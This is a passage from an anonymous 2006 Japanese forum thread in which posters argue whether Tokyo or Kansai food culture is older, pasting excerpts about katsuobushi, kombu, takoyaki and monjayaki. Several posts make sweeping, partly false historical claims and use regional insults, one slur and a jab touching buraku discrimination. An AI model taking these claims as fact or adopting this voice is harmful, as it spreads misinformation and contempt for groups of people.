漏らした罪により、追い返されてしまいます。房州千倉に引き返し、親交のあった渡辺家に身
を寄せました。文化12年3月23日、ちょっとした風邪が原因で、58才で他界しました。

5.本枯節
江戸時代に由緒ある製品として知られたのは、熊野節・土佐節・薩摩節です。明治時代に入
ると伊豆節が目覚しい発展を遂げ、土佐節・薩摩節・伊豆節が三大名産品と称されるように
なりました。

明治30年頃、土佐節と伊豆節の長所を取り入れ、徹底した焙乾・3〜6回のカビ付けを行った
「本枯節」である焼津節が登場し、以後鰹節業界の本流となり、現在に至っています。

つまり現代のかつお節ができたのは、江戸時代初期〜後期にかけてという事になり、それ以
前のかつお節は、干物(完全に干からびた)の煮出し汁でカビ付けなどされていない物
関西地域では、多少生に近いかつお節を「花かつお」にする習慣が江戸時代後期にされたと
言われている。
それまでは、全国的にかつお節は佃煮のような食品である。


109 :もぐもぐ名無しさん:2006/12/25(月) 01:56:47
1.鰹節以前
大和朝廷草創(4〜5世紀)以前に、古代人は「干しカツオ」と「堅魚煎汁<カツオノイロリ>」を
創案しています。 干しカツオは、カツオを素干にしたもの(堅魚)と、煮てから干したもの(煮
堅魚)です。煎汁は、煮堅魚の煮汁を煮詰めて作ったもので、調味料として使われてきまし
た。

日本列島沿岸で豊富に漁獲されるカツオは、タンパク源として重要な位置にあり、大和朝廷
は国々にカツオ浦を定めて、干しカツオと煎汁の献納を強制しました。特に煎汁は、大陸伝
来の調味料(未醤<ミソ>・醤<ヒシオ>・酢等の発酵性調味料)と肩を並べる純国産調味
料として、飛鳥・奈良・平安時代を経て、鎌倉・室町時代まで重用されました。

その後、室町時代になって農業の進歩により、大豆の生産が増加すると、大豆性調味料の
使用量が増え、その分煎汁の使用量が減り、消滅していきました。しかし、カツオの調味料の
味は、人々の脳裏から消え去らず、干しカツオから焙乾法の出現により生まれた鰹節に引き
継がれることになり、日本人の調味料として不動の地位を確立していきます。


110 :もぐもぐ名無しさん:2006/12/25(月) 01:57:17
2.鰹節の誕生
室町時代に入り、干しカツオに「焙乾」という技術が導入され、「鰹節」ができました。江戸時代
に入る前から焙乾小屋は、五島・平戸・紀伊・志摩・土佐各国のカツオ浦に建てられました。
当初の焙乾設備は台所兼用のもので、囲炉裏の上にしつらえた平籠に卸したカツオを入れ
ておくと、煮炊きをする熱と煙により自然と焙乾されるものでした。 江戸時代初頭には、北九
州方面で作られた鰹節は、ポルトガル船・イギリス船などにより、平戸から琉球を経て、明国
・シャム国などに輸出されました。

その後、鰹節が広く世間で名声を得たのは、紀州で焙乾小屋が改良され、鰹節が進歩を始
めてからです。堺港の大商人や、京の都の上流家庭で、煮物・汁物料理が盛んになり、従来
の調味料だけでは物足りなくなり、旨味を付加するために鰹節がだしとして用いられるように
なりました。

江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
のはないほど必需品として取り上げられています。鰹節の力により、日本料理が形成された
といっても過言ではありません。

紀州のかつお節のルーツは佃煮

かつお出汁ができたのは江戸時代である
それまでは、かつお節はお湯でもどしてそのまま食べる魚料理

さば節もほぼ同じルーツ。

特にかつお出汁を取り上げた理由は、大阪うどん「きつねうどん発祥の地」のつゆがかつお
出汁と昆布と言う単純な事から書くことにした。
現代のかつお節が完成したのは明治30年
しかし、花かつおなどやあら節ができあがっただろうと言われているのが江戸時代前半なの
で非常に古い文化と思っているほうが間違え。



111 :もぐもぐ名無しさん:2006/12/25(月) 01:58:47
 京都料理などが、非常に古くから日本の基盤にあったような妄想を書き込む関西人達。
 実際にはかつお節すら無く。それ以外の料理があったと言う事実も無い。

 江戸時代前半に現代のかつお節に類似した商品ができあがってから料理の献立の文献が
非常に多く書かれていることから、江戸時代より前の食文化はほぼ無いに等しい。(現代の
料理店で食べられている食事の事)

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました

熊野節があら節や花かつおになったので、それより昔には懐石料理の原型は無いに等しい

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

 滑稽な事に、大阪人の誇りである。「食文化」が捏造だとわかった。
 昆布出汁だけで作ると言い張る大阪人。
 精進料理でもせいぜい作って伝統の食文化とでも言ってみなさい。(笑)
 精進料理はほぼバチモン料理で、オリジナルの精進料理が非常に少ない。

 どれだけかつお節の世話になっているのか考えた事はあるのだろうか?



112 :もぐもぐ名無しさん:2006/12/25(月) 02:00:23
http://www.ogurayayamamoto.co.jp/study/his.html

太平な世が続き、生活も贅沢になり、江戸文化の特質である「粋」と「通」が料理にも及び始
めました。
昆布はその代表的な茶会における「懐石」にも登場しており、宴席に欠かせないものであった
ようです。
江戸の食べ物商は6160余軒にものぼり、「こぶやあげこぶ」と声をかけて揚げ昆布を売る物
売りも市中を流して歩きました。
また、西回り航路の開発によって昆布は「天下の台所」大坂に送られるようになり、元禄の頃
には、とろろ昆布など加工昆布が盛んに製造され、それらを商う「あきんど」が活躍するように
なりました。
加工法の発達により、昆布は広く人々に愛され、その日常に浸透していきました。

大阪人の「昆布」の話も実は捏造であって、実際に庶民が昆布を食べるようになったのも江
戸時代頃からとされている。これは北海道から運ぶと言う点だけでも分かるとおり、非常に難
解な航海を昔から容易にできていたとは考えにくい事からも想像がつく。(上に記されている
とおり陸路では運ばれていない。)

江戸時代より前の文章にも書かれているとおり、昆布は出汁ではなく、食べ物であってアワ
ビと同等に珍重されていた。

大昔から昆布が食べられていたのは正しいが、現代と同じ食べ方になったのは江戸時代に
入ってからの事でこの事も大阪人によって捏造されている。


113 :もぐもぐ名無しさん:2006/12/25(月) 02:00:58
http://www.nisshin.com/life/komugiko_club/map/kinki.html
たこ焼きの話

写真提供:大阪観光コンベンション協会
気軽に食べられる庶民の味方。おやつによし、ビールのお供にまたよしの“コナモン”の王道
と言えば、やはり「たこ焼き」。このたこ焼きが大阪に登場したのは意外に新しく、明治時代に
東京で生まれた「もんじゃ焼き」の、水分を少なくした「どんどん焼き」が関西に入ってきたの
が、そのルーツと言われています。やがて大正以降、まるいくぼみのある鉄板で一口サイズ
に焼き上げられた「ちょぼ焼き」や、その後には「ラジオ焼き」と呼ばれるおやつが大阪で生ま
れました。「ラジオ」の名が冠されたのは、ラジオが当時の最先端だったこととか、ラジオのツ
マミに似ていたからなどという説があります。いずれにせよ、この時点ではまだ中にタコは入
っておらず、具はこんにゃくやスジ肉だったそう。タコが入れられるようになったのは、昭和10
年頃、明石焼きにヒントを得てからのことと言います。
タコに天かす、紅ショウガ。大阪風のだしをしっかり効かせた生地を手際よく、表面カリカリ、
中身はとろ〜り焼き上げる。甘いソースをべったりぬって、あとは青のり、鰹節。食い倒れの
街、大阪だからこそ生まれた庶民の味には、小さな感動さえわきおこってきます。大阪では
半数以上の家庭にたこ焼き器があるそうですが、最近はどこでもたこ焼き用の鉄板が手に
入りやすくなったようなので、ぜひご家庭で試してみてはいかがでしょうか。なかなか奥の深
いたこ焼きの世界に、きっとあなたもハマるかも?

>このたこ焼きが大阪に登場したのは意外に新しく、明治時代に東京で生まれた「もんじゃ焼き」の、水分>を少なくした「どんどん焼き」が関西に入ってきたのが、そのルーツと言われています。



114 :もぐもぐ名無しさん:2006/12/25(月) 02:02:18
丑三つ時に、変なコピペ貼ったら駄目ですよ。

              By アルツハイマー病棟 婦長より

115 :もぐもぐ名無しさん:2006/12/25(月) 02:02:23
コピペを深夜に貼りまくるキチガイ東京人
そもそも、お前地方出身者なのに、東京擁護してもしかたないって
江戸期からの東京の食を誇って良いのは生粋の東京人だけだよ


116 :もぐもぐ名無しさん:2006/12/25(月) 02:02:35
そばめしの話

細かく刻んだ焼きそば。よくよく見るとその中には、なんとごはんが混ざっているではありませ
んか。この「そばめし」なる食べ物に遭遇し、初めはびっくりした方も多いのではないでしょう
か。おそるおそる口に運んでみると、意外なマッチングに、またびっくり!
そばめしの歴史は意外と古く、その発祥は昭和30年代頃の神戸市長田区と言われます。“
靴の街”として知られる長田区には工場が多く、そこで働く工員がお好み焼き屋で焼きそばを
注文、持参していた弁当のごはんといっしょに炒めてもらったのが始まりと言われています。
これが裏メニューとしてじわじわと浸透していったようです。神戸を中心にいくつかのお店でメ
ニューとして定着してからも全国的に知られることはありませんでした。しかし1995年、阪神
淡路大震災の復興のニュースで、そばめしが紹介されたのをきっかけに、徐々に知られるよ
うになっていきます。2000年頃、冷凍食品が登場してからは、完全に全国区になったと言っ
ていいでしょう。
肉や野菜、切ったそばを炒め、そこにごはんを加え、ソース味で仕上げます。どろっとしたピ
リ辛のソースを使うのが神戸流。半熟に炒めた卵をのっける「オムそばめし」も人気です。

 大阪名物が一つも無い事がおわかりになった事でしょう。

たこ焼きのルーツがもんじゃ焼きだって事が証明されましたね。
http://ja.wikipedia.org/wiki/%E3%82%82%E3%82%93%E3%81%98%E3%82%83%E7%84%BC%E3%81%8D
1819年刊『北斎漫画』に、「文字焼き屋」の挿絵があり、この時代既に江戸にもんじゃ焼きに類するものがあったことが分かっている。

歴史的にも非常に古いもんじゃ焼き


117 :もぐもぐ名無しさん:2006/12/25(月) 02:03:13
明石焼きはたこ焼きのルーツではない

たこ焼きのようで、たこ焼きにあらず。「たこ焼き」と「明石焼き」が大きく異なるのは、地元で
は「玉子焼き」と言われていることからもわかるとおり、ゆるめの生地には卵がふんだんに入
ること。それと、ソースではなく、カツオや昆布のだし汁につけて食べること。この違いだけで
も、明石焼きには、たこ焼きとはまるで異なる味わいがあるものです。
丸く焼いても皿にとると平べったくなってしまうほど、明石焼きはふわふわとやわらかく、箸で
つまむのも難しいくらいですが、その秘密は卵だけでなく、小麦粉のほかに混ぜられる「じん
粉(こ)」にあります。じん粉は、小麦粉からグルテンを分離させた「でんぷん」のことで、ふつ
うは「浮き粉」と呼ばれます。ふわふわの明石焼きには、このじん粉が欠かせません。また、
たこ焼きは通常、鉄板で焼かれるのに対し、明石焼きは薄い銅製の専用型で焼くお店がほと
んどです。
明石焼きの起源についてですが、今からおよそ160年前の天保年間、明石に「明石珠(玉)」
という工芸品がありました。これは卵白を使用した珊瑚の代用品で、かんざしなどに使われ
ました。卵の白身を使うので、黄身のほうが余ってしまいます。そこで卵黄と、明石でよく採れ
たタコを使って「玉子焼き」が生まれたという説があります。明石焼きが大阪のたこ焼きの元
になったというのは、「たこ焼き」の項で触れたとおりです。



118 :もぐもぐ名無しさん:2006/12/25(月) 02:04:33
>>116>>117
悩みでもあるの?


119 :もぐもぐ名無しさん:2006/12/25(月) 02:05:43
そばめしの話

細かく刻んだ焼きそば。よくよく見るとその中には、なんとごはんが混ざっているではありませ
んか。この「そばめし」なる食べ物に遭遇し、初めはびっくりした方も多いのではないでしょう
か。おそるおそる口に運んでみると、意外なマッチングに、またびっくり!
そばめしの歴史は意外と古く、その発祥は昭和30年代頃の神戸市長田区と言われます。“
靴の街”として知られる長田区には工場が多く、そこで働く工員がお好み焼き屋で焼きそばを
注文、持参していた弁当のごはんといっしょに炒めてもらったのが始まりと言われています。
これが裏メニューとしてじわじわと浸透していったようです。神戸を中心にいくつかのお店でメ
ニューとして定着してからも全国的に知られることはありませんでした。しかし1995年、阪神
淡路大震災の復興のニュースで、そばめしが紹介されたのをきっかけに、徐々に知られるよ
うになっていきます。2000年頃、冷凍食品が登場してからは、完全に全国区になったと言っ
ていいでしょう。
肉や野菜、切ったそばを炒め、そこにごはんを加え、ソース味で仕上げます。どろっとしたピ
リ辛のソースを使うのが神戸流。半熟に炒めた卵をのっける「オムそばめし」も人気です。

 大阪名物が一つも無い事がおわかりになった事でしょう。

たこ焼きのルーツがもんじゃ焼きだって事が証明されましたね。
http://ja.wikipedia.org/wiki/%E3%82%82%E3%82%93%E3%81%98%E3%82%83%E7%84%BC%E3%81%8D
1819年刊『北斎漫画』に、「文字焼き屋」の挿絵があり、この時代既に江戸にもんじゃ焼きに類するものがあったことが分かっている。

歴史的にも非常に古いもんじゃ焼き


120 :もぐもぐ名無しさん:2006/12/25(月) 02:06:33
http://hb2.seikyou.ne.jp/home/my-morita/ni/how_to/ni_chronology2.htm
今川焼き、たい焼きも東京が発祥

http://www.meikatanbou.com/chi_/chi_w/w_s071.htm
///駄菓子/// 

駄菓子とは菓子の中の駄物という意味では、安価で質も高級品ではない干菓子をさしていま
すが、もともとは江戸時代の「雑菓子」からきています。精製された白砂糖が貴重品であった
ために、幕府は庶民の菓子に白砂糖の使用を禁止し、庶民が口にする菓子の甘味料には黒
砂糖が用いられました。これを雑菓子と呼び、大名や武士だけが食する上菓子と区別したの
です。その後、白砂糖の生産力が高まり、明治以降は上菓子と雑菓子の区別はなくなりまし
たが、雑菓子のルーツを受け継ぐ安い菓子の総称として「駄菓子」という名が使われるように
なりました。大正末期から昭和初期にかけては町の駄菓子屋に加えてべっこう飴やゲンコツ
飴、蒸し羊羹などを売り歩く行商人もいました。戦後になって砂糖の配給制が無くなる頃には
駄菓子屋も復興し、チューインガム、チョコレート、ラムネ、コーラといった西洋の菓子も店頭
に並ぶようになりました。
子供用の駄菓子とは違う「郷土駄菓子」という菓子もあります。有名な地域は仙台・会津・飛
騨などが挙げられます。その土地ならではの作物を主原料にシンプルな調味料だけで作ら
れます。有平糖、かりんとう、せんべい、ようかんなど同じ菓子でも地域によって味は変わり
、地方名菓として和菓子屋などで販売されています。


和菓子が江戸で文化が栄えなかったわけは、庶民の白砂糖の使用を幕府が禁止していた
事があげられる。
大名や武士だけが食する上菓子と区別したのです。
東京にある和菓子が駄物(だもの)が多い理由は幕府による規制が強すぎて、和菓子屋が
衰退しまった為です。


121 :もぐもぐ名無しさん:2006/12/25(月) 02:07:06
http://www.arakawa-unet.jp/issue/0604/index.html
もんじゃ焼きは荒川が発祥

大正育ちの叔母の記憶によると、当時から三河島の駄菓子屋ではもんじゃ焼きがあったそう
です。もんじゃ焼きは「駄物(だもの)」といって、駄菓子屋で出す子ども向けのお菓子のひと
つでした。紙が高級品だった時代なので鉄板にメリケン粉を薄く延ばし、子どもたちに字を教
えていたと聞きます。「文字焼き」が、もんじゃ焼きの語源というのも、あながち嘘ではないの
かもしれません。店の隅に練炭やタドンを置き、その上に鉄板を敷いてもんじゃを商っていた
のでしょう。
「あんこ焼き」は和菓子そのもの、出来立てのアツアツが美味しい。
 子どもたちは、もんじゃ焼きの中にあんこ玉を挟んだりソースせんべいに絡ませたりと、駄
菓子屋にある他のお菓子と組み合わせては、おいしく食べる工夫をしたようです。それが、も
んじゃ焼きのバラエティの多さに発展していったのでしょう。
 駄菓子屋(もんじゃが食べられる所)の多さを考えると、戦後は日暮里に駄菓子問屋街もあ
りましたから、もんじゃ焼きの始まりはやはり荒川区か台東区でしょうね。

こんな事が「どら焼き」などのルーツであって、きらびやかで雅な世界とはかけ離れている。
どこでも生まれる文化ではなく、下町の人々の甘いものに対する思いが今の形のたい焼き、
今川焼き、どら焼きといった文化を形成してきたのである。


122 :もぐもぐ名無しさん:2006/12/25(月) 02:07:26
>>105
子供は、6枚切りの1枚でお腹いっぱいに為る事が多いよ。
て言うか、頭悪いねって言う前に各家庭のやり方も有るんだから少し考えたら?
それに家庭の人数にもよるでしょ。

123 :もぐもぐ名無しさん:2006/12/25(月) 02:07:44
だいたい、関西の「全ての」食否定しようとするところにかなり無理がある
幼稚すぎるというか、普通にリアルでも軽く議論できる程度のソースもってきなよ
それと、箇条書きにしてくれ
まとめる能力ないんだろうけどw
しっかし、よくもまぁ、それだけのコピペ保有してるよなぁ(笑

124 :もぐもぐ名無しさん:2006/12/25(月) 02:07:58
http://www.arakawa-unet.jp/issue/0604/index.html
もんじゃ焼きは荒川が発祥

大正育ちの叔母の記憶によると、当時から三河島の駄菓子屋ではもんじゃ焼きがあったそう
です。もんじゃ焼きは「駄物(だもの)」といって、駄菓子屋で出す子ども向けのお菓子のひと
つでした。紙が高級品だった時代なので鉄板にメリケン粉を薄く延ばし、子どもたちに字を教
えていたと聞きます。「文字焼き」が、もんじゃ焼きの語源というのも、あながち嘘ではないの
かもしれません。店の隅に練炭やタドンを置き、その上に鉄板を敷いてもんじゃを商っていた
のでしょう。
「あんこ焼き」は和菓子そのもの、出来立てのアツアツが美味しい。
 子どもたちは、もんじゃ焼きの中にあんこ玉を挟んだりソースせんべいに絡ませたりと、駄
菓子屋にある他のお菓子と組み合わせては、おいしく食べる工夫をしたようです。それが、も
んじゃ焼きのバラエティの多さに発展していったのでしょう。
 駄菓子屋(もんじゃが食べられる所)の多さを考えると、戦後は日暮里に駄菓子問屋街もあ
りましたから、もんじゃ焼きの始まりはやはり荒川区か台東区でしょうね。

こんな事が「どら焼き」などのルーツであって、きらびやかで雅な世界とはかけ離れている。
どこでも生まれる文化ではなく、下町の人々の甘いものに対する思いが今の形のたい焼き、
今川焼き、どら焼きといった文化を形成してきたのである。



125 :もぐもぐ名無しさん:2006/12/25(月) 02:09:31
 江戸時代より前まではかつお節や昆布は佃煮のように食べる食品だった。
 つまり関西地方、特に京都や大阪でかつお節や昆布を出汁にして料理を作っていたと言う歴史的証拠が
全く無い。

 生の魚を刺身で食べたり寿司で食べたりすることも築地市場に冷凍倉庫ができあがった70年前あたりか
らの事で、実際に刺身で食べられるほどの鮮度の保てる冷蔵庫ができたのが40年程度前のこと。

 砂糖は江戸幕府の支配していた食品で、白砂糖は特に武士や一部の僧侶くらいしか食べる事ができな
かった。庶民は非常に高額な黒砂糖しか使えなかったので、砂糖を使う食品文化は、すべて武士や僧侶
以上の地位についていた人々の料理だったと言える。

 江戸幕府が衰退して2回の世界大戦を経験し、裕福な生活を送れるようになった現代では、以上の食材が
容易に手に入る事から、昔の貴族社会や武家社会が非常に贅沢な食べ物を毎日食べていたかのごとく語
られているが、庶民の食文化の歴史は実際には、ここ30年程度の歴史の話であり、それより昔の食生活が
ひどいものだった事は言うまでも無い。

 当然、お金回りの良い土地の方が豊かな生活が送れていた。だから、地方で東京ほどすぐれた食生活が
おくれていた可能性は極めて低い。
 戦時中に疎開を強いられたときに、田舎者が食料を高額で売りつけたと言う話が良く聞かれる。
 田舎者には特有の差別意識が有り、大阪の同和地区に限った話ではない。



126 :もぐもぐ名無しさん:2006/12/25(月) 02:09:31
>>122
>普通は偶数で切り出すからでしょ?
 分厚くて奇数じゃ、家族だと割り切れないし、子供なら余すでしょ。

家庭の人数によるでしょ?って言うんなら、↑の決め付け発言おかしくね?
素直に謝っとけ


127 :もぐもぐ名無しさん:2006/12/25(月) 02:10:23
不味い水で出汁を取る大阪

琵琶湖の汚染はなにが原因か

 琵琶湖をのぞむ比良山系は、関西の登山では一番人気の武奈ガ岳(1214m)などが連らなる。この山地
が降った雨を涵養し琵琶湖へ流す。森は水を浄化し、土砂の流出を防ぎ二酸化炭素を吸収する。京都精華
大学の山田国広氏は『水と暮らしの環境文化』(昭和堂出版)の中で、「下流の都市住民は、上流の森林に
降った水を飲んでいることをほとんど意識していない。上流の森林が健全に育成されているからこそ、下流
は安心して水が飲める」と書いている。本書中では同氏は下流の住民は森林の機能を評価して、例えば水
源税や森林税や環境税というかたちで恩恵の還元をなすことを提唱している。

 水質検査の結果琵琶湖の水がかなり汚染されていることがわかった時、私はいささか落胆した。水道の蛇
口をひねれば水が出る、レバーを押せば尿が視界から消える。日常のあたりまえとなった動作に、「水の流
れ」を考えることもなくなっていたことを恥ずかしいと思った。

 農家に生まれ子供の頃から湧き水で育った。飲み水の大切さを生活の中で教えられていた。川を誰もが大
切に守っていたのである、そうした思いを新たにした水質検査であった。

http://www.bund.org/culture/20060515-1.htm


東京と大阪の水の硬度を示した場合。ほぼ同じ硬度になっている。
世界的な水準で考えると日本の水はほぼ軟水と言う事が図からわかります。
大阪人は東京の水が硬水で出汁を取るのに向かないと言い張ってますが、実際には同じです。

http://www.con-pro.net/readings/water/doc0017.html


128 :もぐもぐ名無しさん:2006/12/25(月) 02:11:39
「江戸食」は日本古来の和食の原点

http://www.athome.co.jp/academy/culture/cul17.html

江戸食文化紀行

http://www.kabuki-za.com/syoku/bkindex.html


129 :もぐもぐ名無しさん:2006/12/25(月) 02:12:20
http://www.kyoto-np.co.jp/kp/special/shiokaze/shiokaze_index.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita01.html
近江商人が開拓した北海交易に雇われた北陸の船乗りが力をつけて独立、北前船交易が隆盛をきわめ、西回りで大阪まで昆布が持ち込まれるのは、江戸時代になってからだ。
この頃、白口浜の昆布が京、大阪へ届く。透明な出汁で京料理に欠かせない利尻昆布はさらに遅れる。

http://www.kyoto-np.co.jp/kp/special/shiokaze/kita02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita03.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita04.html
かつお節
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare01.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare02.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kare03.html

京料理で重要なかつお節が出来上がったのは明治30年


130 :もぐもぐ名無しさん:2006/12/25(月) 02:13:36
大阪人:ワシらは地元の料理を大切にしてる
東京人:そうですか、それなら吉兆の事も良くご存知でしょうね
大阪人:素材の味がして薄口や
東京人:それじゃ意味がわかりません
大阪人:大阪は焼肉がうまいで
東京人:焼肉は韓国料理ですよ。地元の食べ物じゃないですよね
大阪人:頭狂人はフランス料理を自慢するやないか
東京人:フランス料理を真っ向から否定し続けて韓国料理は否定しないんですか?
大阪人:、、、、、、、、、
大阪人:カッペ、カッペ
東京人:まともな会話になりません


131 :もぐもぐ名無しさん:2006/12/25(月) 02:14:17
東京コピペ君の昨日の様子

http://image.blog.livedoor.jp/news4vip2/imgs/0/5/059b3a01.jpg


132 :もぐもぐ名無しさん:2006/12/25(月) 02:18:26
 京都料理などが、非常に古くから日本の基盤にあったような妄想を書き込む関西人達。
 実際にはかつお節すら無く。それ以外の料理があったと言う事実も無い。

 江戸時代前半に現代のかつお節に類似した商品ができあがってから料理の献立の文献が
非常に多く書かれていることから、江戸時代より前の食文化はほぼ無いに等しい。(現代の
料理店で食べられている食事の事)

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました

熊野節があら節や花かつおになったので、それより昔には懐石料理の原型は無いに等しい

>江戸時代初期は、この紀州で作られた鰹節が「熊野節」の名で一世を風靡しました。ちょうど
>この時期にたくさんの料理書が発刊され、その中で調味料として鰹節だしについて触れぬも
>のはないほど必需品として取り上げられています。

 滑稽な事に、大阪人の誇りである。「食文化」が捏造だとわかった。
 昆布出汁だけで作ると言い張る大阪人。
 精進料理でもせいぜい作って伝統の食文化とでも言ってみなさい。(笑)
 精進料理はほぼバチモン料理で、オリジナルの精進料理が非常に少ない。

 どれだけかつお節の世話になっているのか考えた事はあるのだろうか?



133 :もぐもぐ名無しさん:2006/12/25(月) 02:20:09
>京都料理などが、非常に古くから日本の基盤にあったような妄想を書き込む関西人達。
 実際にはかつお節すら無く。それ以外の料理があったと言う事実も無い。

京都の料理が朝廷に出されていた頃、
江戸そのものが存在していませんでした




終了

134 :もぐもぐ名無しさん:2006/12/25(月) 02:20:50
公安調査庁 北朝鮮に警戒を
http://www3.nhk.or.jp/news/2006/12/23/k20061223000008.html
12月23日 5時49分

公安調査庁が国内外の治安情勢をまとめた「内外情勢の回顧と展望」によりますと、
北朝鮮は、安倍政権の拉致問題や核実験への対応に強く反発しているとして、
今後、日本に対して有害な活動に走る可能性も含め、動向には警戒が必要だと指摘しています。

暴力団の活動は多様化・巧妙化 フロント企業を使用
賭博や覚せい剤に頼らない芸能興行などが新たな資金源として確立されている
http://i138.photobucket.com/albums/q270/newscap/cap2/yakuza02.jpg

「日本を知るには裏社会を知る必要がある」 元公安調査庁の菅沼氏が講演
http://p2.chbox.jp/read.php?host=news18.2ch.net&bbs=mnewsplus&key=1166711995&ls=26

135 :もぐもぐ名無しさん:2006/12/25(月) 02:22:00
関連のないコピペ貼りだしたよ・・・
コワイヨー!婦長さんー!

136 :もぐもぐ名無しさん:2006/12/25(月) 02:23:24
松下 いえいえ、呼び方からして違います。当時、野菜は青物と呼ばれており、その種類なども現在とは随
分違っていました。

例えば、「料理物語」の中では、タンポポやボタンの花、ハコベなども野菜とされています。現在、山菜や野草
とされているものが、江戸の料理書では数多く野菜類として紹介されているのです。

―― タンポポが野菜ですか?

松下 そうなんですよ!(笑)幕末の「年中番菜録」を見ても、江戸時代初期と比べて花や葉の利用がやや少
なくなり、サツマイモとカボチャが加わったくらいで、基本的にはそれほど変っていません。当時は、野菜の種
類がとても少なかったようですね。

―― では、現在のような野菜のラインナップは明治以降ということですか?

松下 ええ。今や私たちの食生活に欠かせないハクサイ、タマネギ、キャベツ、ピーマン、レタス、アスパラな
どは、明治以降に外国から持ち込まれたもので、江戸時代にはありませんでした。

―― 現在ポピュラーな野菜の多くが、明治以降もしくは戦後日本にやってきたものなのですね。

とすると江戸時代の農民は、米作が主で、野菜は全然作っていなかったのでしょうか?

松下 そんなことはありませんが、菜っぱ類に関していえば、野生種がとても豊富で、あえて栽培しなくても
困らなかったようです。一方、野菜の中でも比較的空腹を満たすことができるニンジンやダイコン、サトイモな
どの根菜類、キュウリやナスビ、トウガンなどの果菜類等は、飢饉に備えた食料として栽培が重視されていた
ようです。

関西の精進料理の野菜事態存在しない事が明らかになりました。

精進料理も捏造されたものです。

137 :もぐもぐ名無しさん:2006/12/25(月) 02:26:09
ハクサイ、タマネギ、キャベツ、ピーマン、レ タス、アスパラ以外の野菜は江戸以前からありました。




終了

138 :もぐもぐ名無しさん:2006/12/25(月) 02:27:05
東京コピペ君の昨日の様子

http://image.blog.livedoor.jp/news4vip2/imgs/0/5/059b3a01.jpg



139 :もぐもぐ名無しさん:2006/12/25(月) 02:27:46
松下 そうなんですよ!(笑)幕末の「年中番菜録」を見ても、江戸時代初期と比べて花や葉の利用がやや少

なくなり、サツマイモとカボチャが加わったくらいで、基本的にはそれほど変っていません。当時は、野菜の種

類がとても少なかったようですね。

当時は野菜の種類はとても少なかったが読めないらしい。

140 :もぐもぐ名無しさん:2006/12/25(月) 02:28:23
東京と大阪の水の硬度を示した場合。ほぼ同じ硬度になっている。
世界的な水準で考えると日本の水はほぼ軟水と言う事が図からわかります。
大阪人は東京の水が硬水で出汁を取るのに向かないと言い張ってますが、実際には同じです。

http://www.con-pro.net/readings/water/doc0017.html


141 :もぐもぐ名無しさん:2006/12/25(月) 02:28:25
まったく、少しでも東京に都合の悪い事実が出るとすぐこれだもんな。
コピペやめろ。

142 :もぐもぐ名無しさん:2006/12/25(月) 02:29:08
http://www.kyoto-np.co.jp/kp/special/shiokaze/shiokaze_index.html
http://www.kyoto-np.co.jp/kp/special/shiokaze/kita01.html
近江商人が開拓した北海交易に雇われた北陸の船乗りが力をつけて独立、北前船交易が隆盛をきわめ、西回りで大阪まで昆布が持ち込まれるのは、江戸時代になってからだ。
この頃、白口浜の昆布が京、大阪へ届く。透明な出汁で京料理に欠かせない利尻昆布はさらに遅れる。


143 :もぐもぐ名無しさん:2006/12/25(月) 02:31:15
不味い水で出汁を取る大阪

琵琶湖の汚染はなにが原因か

 琵琶湖をのぞむ比良山系は、関西の登山では一番人気の武奈ガ岳(1214m)などが連らなる。この山地
が降った雨を涵養し琵琶湖へ流す。森は水を浄化し、土砂の流出を防ぎ二酸化炭素を吸収する。京都精華
大学の山田国広氏は『水と暮らしの環境文化』(昭和堂出版)の中で、「下流の都市住民は、上流の森林に
降った水を飲んでいることをほとんど意識していない。上流の森林が健全に育成されているからこそ、下流
は安心して水が飲める」と書いている。本書中では同氏は下流の住民は森林の機能を評価して、例えば水
源税や森林税や環境税というかたちで恩恵の還元をなすことを提唱している。

 水質検査の結果琵琶湖の水がかなり汚染されていることがわかった時、私はいささか落胆した。水道の蛇
口をひねれば水が出る、レバーを押せば尿が視界から消える。日常のあたりまえとなった動作に、「水の流
れ」を考えることもなくなっていたことを恥ずかしいと思った。

 農家に生まれ子供の頃から湧き水で育った。飲み水の大切さを生活の中で教えられていた。川を誰もが大
切に守っていたのである、そうした思いを新たにした水質検査であった。

http://www.bund.org/culture/20060515-1.htm


144 :もぐもぐ名無しさん:2006/12/25(月) 02:33:37
全然東京優位の根拠になってないコピペを貼りまくってるところがすごいな

江戸幕府できるまで、江戸は農家数十戸の寒村でっせ
それ以前から公家はいいもん食べてきたんだからさぁ
京野菜つーのもあるし


145 :もぐもぐ名無しさん:2006/12/25(月) 02:36:05
>>126
はい、ごめんなさいね。
関西の方はもう少し柔らかく発言出来ないんですか?
疑問と思ったり異論があるならば、普通に発言すればいいと思いますが。

ちなみに質問なのですが、関西の食(たこ焼き等、全国的に知れている物)って味の濃い物多くて飽きないんですか?
味覚障害になったりしないんですか?

146 :もぐもぐ名無しさん:2006/12/25(月) 02:36:25
東京コピペ君、書き込み制限繰り返し中wwwww



147 :もぐもぐ名無しさん:2006/12/25(月) 02:36:31
http://www.nisshin.com/life/komugiko_club/map/kinki.html
たこ焼きの話

写真提供:大阪観光コンベンション協会
気軽に食べられる庶民の味方。おやつによし、ビールのお供にまたよしの“コナモン”の王道
と言えば、やはり「たこ焼き」。このたこ焼きが大阪に登場したのは意外に新しく、明治時代に
東京で生まれた「もんじゃ焼き」の、水分を少なくした「どんどん焼き」が関西に入ってきたの
